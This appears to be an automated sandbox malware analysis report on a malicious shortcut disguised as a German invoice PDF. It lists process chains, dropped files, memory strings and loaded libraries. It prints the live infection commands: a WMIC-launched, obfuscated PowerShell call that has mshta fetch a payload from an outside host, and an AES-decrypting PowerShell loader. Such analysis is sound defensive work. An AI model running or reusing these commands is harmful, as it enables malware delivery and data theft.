                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                      Source: TCUINOVJ.exe, 0000000F.00000003.2256610867.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000002.2297719622.0000000008B4C000.00000004.00000020.00020000.00000000.sdmp, iScrPaint.exe, 00000010.00000003.2271753574.0000000000830000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000012.00000002.2563712553.0000000004F70000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2841835521.0000000004CF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: explorer.exe, 00000015.00000003.2634324931.0000000005EC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634404916.0000000005EC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2634516058.0000000005EC6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                      Source: explorer.exe, 00000015.00000003.2688636073.00000000061B9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: Yara matchFile source: Process Memory Space: iScrPaint.exe PID: 5880, type: MEMORYSTR

                      System Summary

                      barindex
                      Source: WMIC.exe, 00000000.00000002.2025755289.00000155FA020000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie"C:\Users\user\Desktop\Rechnung736258.pdf.lnkWinsta0\Defaultp2Vmemstr_b1c01ac5-9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\TCUINOVJ.exe
                      Source: Rechnung736258.pdf.lnkLNK file: process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie"
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00404FAA15_2_00404FAA
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_0041206B15_2_0041206B
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_0041022D15_2_0041022D
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00411F9115_2_00411F91
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe 46AFBF1CBD2E1B5E108C133D4079FADDC7347231B0C48566FD967A3070745E7F
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: String function: 0040243B appears 37 times
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2845
                      Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 2845Jump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winLNK@36/74@5/3
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,15_2_00407776
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_0040118A GetDiskFreeSpaceExW,SendMessageW,15_2_0040118A
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,15_2_004034C1
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeCode function: 15_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,15_2_00401BDF
                      Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\documentcomplie[1]Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6128:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bav2tqbe.jfe.ps1Jump to behavior
                      Source: Yara matchFile source: 16.0.iScrPaint.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\iScrPaint.exe, type: DROPPED
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
                      Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Rechnung736258.pdf.lnkReversingLabs: Detection: 15%
                      Source: Rechnung736258.pdf.lnkVirustotal: Detection: 24%
                      Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie"
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf"
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,8685861103174925006,15707268363344924565,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\TCUINOVJ.exe "C:\Users\user\AppData\Roaming\TCUINOVJ.exe"
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeProcess created: C:\Users\user\iScrPaint.exe "C:\Users\user\iScrPaint.exe"
                      Source: C:\Users\user\iScrPaint.exeProcess created: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplieJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6)Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\TCUINOVJ.exe "C:\Users\user\AppData\Roaming\TCUINOVJ.exe" Jump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,8685861103174925006,15707268363344924565,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Roaming\TCUINOVJ.exeProcess created: C:\Users\user\iScrPaint.exe "C:\Users\user\iScrPaint.exe" Jump to behavior
                      Source: C:\Users\user\iScrPaint.exeProcess created: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe
                      Source: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wininet.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: mswsock.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: ieframe.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: netapi32.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: rasadhlp.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: schannel.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: ntasn1.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: ncrypt.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: imgutil.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: dxcore.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: mlang.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: textshaping.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: edputil.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: appresolver.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: bcp47langs.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: slc.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: sppc.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
